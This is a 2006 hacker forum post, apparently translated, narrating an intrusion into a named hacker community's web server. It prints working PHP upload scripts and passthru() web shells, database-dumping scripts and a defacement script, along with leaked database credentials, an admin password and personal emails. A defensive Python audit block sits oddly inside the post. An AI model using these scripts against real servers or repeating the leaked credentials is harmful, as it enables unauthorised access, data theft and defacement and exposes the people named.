Author: roninmorgue
Date: May 31st, 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/
------------------------------------------------------------
Until now I have always posted about vulnerabilities in a piece of software.
Perhaps you are all bored. So this time I will try posting how I
hacked the MalangHackerLink community.
1
After carrying out the reconnaissance and scanning stages, I found that the
MalangHackerLink server still has weaknesses -> Apache/1.x.xx, passthru is enabled/on.
Note: I am keeping the server's IP address secret.
2
After obtaining access to upload files to the server <no need to tell that part,
right.. wink>, I found that the server's root path is /home/[folder_target]/public_html…
this was found from the nameserver configuration file -->
================cut===========================
malanghack.net: sincan2 /home/sincan2/public_html
================cut===========================
3
Then I uploaded a very important file, a script for uploading
files to the target's root_path in the /upload folder, so that everything can be done through
a URL (easier..) -->
upload.php
============================cut======================
<?php
}
else
{
$path=$target_folder;
$simpan="$path".$HTTP_POST_FILES['filenya']['name'];
if($HTTP_POST_FILES['filenya']['size'] <=0)
{
print"File anda gagal di upload...!";
}
else
{
@copy($HTTP_POST_FILES['filenya']['tmp_name'],$simpan);
print"file anda berhasil di upload...!";
}
}
?>
The next step was that I uploaded the script cmd.php to the root_path of
MalangHackerLink
cmd.php
<?
echo "".passthru(' ls -la /home/sincan2/public_html ; id ')."";
?>
This script serves to run shell commands on the vulnerable server. Although
I only have the 'nobody' access level, far from the hope of getting the 'root' access level,
this is already enough for us to keep exploiting it wink
total ***
drwxr-x--- 37 sincan2 nobody 2048 Apr 13 2005 .
drwx--x--x 14 sincan2 sincan2 1024 Dec 1 09:22 ..
drwxrwxrwx 14 sincan2 sincan2 360 Apr 1 2005 upload
-rw-r--r-- 1 sincan2 sincan2 360 Apr 2 2005 article.php
-rw-r--r-- 1 sincan2 sincan2 630 Apr 13 2005 article_read.php
-rw-r--r-- 1 sincan2 sincan2 360 Apr 2 2005 connect.php
-rw-r--r-- 1 sincan2 sincan2 626 Apr 13 2005 download_read.php
-rw-r--r-- 1 sincan2 sincan2 626 Apr 13 2005 deface_read.php
-rw-r--r-- 1 sincan2 sincan2 626 Apr 13 2005 index.php
=========================cut====================
4
Gotcha.. I saw an interesting file..., namely connect.php (I assumed
that is where the MalangHackerLink database configuration is located). So I again uploaded
a script, cmd1.php, using upload.php
cmd1.php
<?
echo "".passthru(' cat /home/sincan2/public_html/connect.php ')."";
?>
and hmmm... the database connection configuration was revealed… smile
connect.php
<?
$database="sincan2_hack";
$sqlhost="localhost";
$sqluser="sincan2_abde";
$sqlpass="abdecakep12345";
mysql_connect($sqlhost,$sqluser,$sqlpass) OR DIE("1");
mysql_select_db($database) OR DIE("1");
?>
5
At this point, I tried to exploit the database... Upload the scripts
config1.php, config2.php, the result of my long thinking smile
============================cut=====================
}
else
{
mysql_connect($server,"$user", “$password");
$hasil=mysql_db_query($db, “show tables from $db");
$isi=mysql_num_rows($hasil);
while($isi1=mysql_fetch_row($hasil))
{
for($jml=0;$jml<$isi;$jml++)
{
$isi2.="$isi1[$jml] “;
}
}
echo “Lihat field Table pada $db”;
echo “
<form name="form1" method="post" action="config2.php?proses=1">
<table width="325" border="1" cellspacing="1" cellpadding="0">
<tr >
<td width="150">Masukkan table</td>
<td width="4">:</td>
<td width="170">
<input name="table" type="text" id="table">
<input type="hidden" name="db" value="$db">
<input type="hidden" name="server" value="$server">
<input type="hidden" name="user" value="$user">
<input type="hidden" name="password" value="$password"></td>
</tr>
<tr>
<td></td>
<td></td>
<td><input name="submit" type="submit" id="submit" value="Attack"></td>
</tr>
</table>
</form> “;
echo “Nama-nama table database $db”;
echo “<table width="700" border="1" cellspacing="1" cellpadding="0" >”;
echo “<tr bgcolor="#000000"><td>$isi2</td></tr></table>";
echo “
<a href=config1.php>kembali</a>”;
}
?>
============================cut=====================
config2.php
<?php
switch($proses)
{
case'1':
{
mysql_connect("$server","$user", "$password");
$parameter=mysql_db_query($db, "show fields from $table");
$isi1=mysql_num_rows($parameter);
while($isi2=mysql_fetch_row($parameter))
{
for($jml=0;$jml<$isi1;$jml++)
{
$isi3.="$isi2[$jml] ";
}
}
echo "field-field table $table
";
echo "<table width="700" border="1" cellspacing="1"
cellpadding="0" >";
echo "<tr ><td>$isi3</td></tr></table>";
$hasil=mysql_db_query($db, "select * from $table");
$isi=mysql_num_rows($parameter);
while($isi1=mysql_fetch_row($hasil))
{
for($jml=0;$jml<$isi;$jml++)
{
$isi2.="$isi1[$jml] "."|";
}
}
echo "
isi table $table
";
echo "<table width="700" border="1" cellspacing="1"
cellpadding="0" >";
echo "<tr bgcolor="#000000"><td>$isi2</td></tr></table>";
============================cut=====================
6
smile got it… good job, here are the contents of the database... the data:
* Nama-nama table database sincan2_hack -->
admin article crew deface depan download links
** field-field table admin -->
no int(5) PRI auto_increment user varchar(50) pass varchar(100)
md5pass varchar(255) email varchar(255) last varchar(255) nick varchar(50)
email_id varchar(100)
*** isi table admin -->
1 |sincan2 |- |- |sincan2@malanghack.net | |Sincan2 |haldi1304 |
** field-field table crew -->
no int(11) PRI nama varchar(255) email varchar(255) url varchar(255)
*** isi table crew -->
1 |J1nX |abde@j1nx.net |http://j1nx.net/ |
** field-field table depan
no int(5) depan longtext
*** isi table depan
1 |
Welcome to #malanghack
Rendrian Rizaldi Putra Atmono 7 Oktober 2005 jam 11 Malam
(HADI + ERNA)
--------------------------------------------------------
Selamat Tinggal 2005 masa kelam di mana suka dan duka selalu menyelimuti kita
Dan selamat Datang 2006 semoga Tuhan senantiasa bersama kita.
--------------------------------------------------------
Selamat Hari Natal Untuk semuanya yang merayakan.
--------------------------------------------------------
7
Previously my attention was on the 'admin' table, but it turned out the login does not use
the database :( , so I turned my attention to the 'depan' table, because in my opinion
the Master's greeting message is in this table
8
What next… OK, with drwxrwxrwx status on the /upload folder, we can write
a file
expl.php
<?php
print "
";
print " =======================================
";
print " MalangHackerLink Local Root Exploit
";
print " =======================================
";
print "
";
print "[+] Now attacking ";
print "
";
print "[+] Building page extension..";
$exploit_file = fopen("Explhackerlink.php", "a+");
print "[DONE]
";
print "[+] Update Database ..";
$the_exploit = "<?
include("../connect.php");
mysql_connect($sqlhost, $sqluser, $sqlpass);
$hasil = mysql_db_query($database, "UPDATE depan SET depan =
'Hack By Anstellwinkel' WHERE no = 1");
?>”;
print “[DONE]
“;
print “[+] Sending bugs writable [a+]..
“;
print “[+] Create Explhackerlink.php...”;
if (flock($exploit_file, LOCK_EX)) {
fputs($exploit_file, $the_exploit);
flock($exploit_file, LOCK_UN);
print “[OK] “;
print “ “;
print “[+] Sending bugs..[DONE]!!
“;
print “[*] Exploited Successed!
“;
print “ “;
print “------------------------------------------------------------------
“;
print “ + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +
“;
print “------------------------------------------------------------------
“;
}else {
print “
“;
print “[!] [FAILED] Permission is not writable!!
“;
print “
“;
print “------------------------------------------------------------------
“;
print “ + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +
“;
print “------------------------------------------------------------------
“;
}
fclose($exploit_file);
print “<a href=Explhackerlink.php>MalangHackerLink Exploited”;
?>
9
Done..., OK actually we could be more extreme by dropping the database but…
remember about ethical hacker -> not for criminal, not destruction… just letting
the admin know smile
Note: all of my scripts have been posted on this forum, or DL at -->>
http://www.geocities.com/anstellwinkel/ ... equest.zip
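The conditions this write-up depends on (PHP files placed in a world-writable /upload directory and calls to passthru()) can be checked for from the defender's side. The following is an added example, not code from the original post; the function names, the list of command-execution functions and the sample tree are assumptions constructed for illustration.

```python
import os, re, stat, tempfile

# PHP functions that run OS commands; passthru() is the one used in the post.
# The rest of the list is an assumption added for this example.
EXEC_CALL = re.compile(rb"\b(passthru|system|shell_exec|exec|popen|proc_open)\s*\(")
PHP_EXT = (".php", ".php3", ".php4", ".php5", ".phtml")

def audit_webroot(root):
    """Return sorted (finding, relative_path) tuples for a web document root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        # "Other" write bit set means any local account, including the
        # web server's own user, can create files here.
        writable = bool(os.stat(dirpath).st_mode & stat.S_IWOTH)
        if writable:
            findings.append(("world-writable-dir", os.path.relpath(dirpath, root)))
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if writable:
                # Executable script type inside a directory anyone can write to.
                findings.append(("php-in-writable-dir", rel))
            with open(path, "rb") as fh:
                if EXEC_CALL.search(fh.read()):
                    findings.append(("command-exec-call", rel))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample tree loosely mirroring the listing in the post."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.mkdir(os.path.join(root, "upload"))
    samples = {
        "index.php": b"<?php echo 'home'; ?>",
        "connect.php": b"<?php $sqlhost = 'localhost'; ?>",
        "upload/cmd.php": b"<? echo passthru('id'); ?>",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    os.chmod(root, 0o755)
    os.chmod(os.path.join(root, "upload"), 0o777)  # drwxrwxrwx, as in the post
    return root

if __name__ == "__main__":
    for finding, path in audit_webroot(build_sample_tree()):
        print(f"{finding:22} {path}")
```

Findings of this kind are usually addressed by removing the world-write bit from the directory, turning off script execution for upload folders in the web server configuration, and listing passthru and similar functions in PHP's disable_functions setting.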
------------------------------------------------------------------
Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, newbie, cloud)
~ mercubuana-it@yahoogroups.com ,
------------------------------------------------------------------
Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
----------------------------------- [ EOF ] ----------------------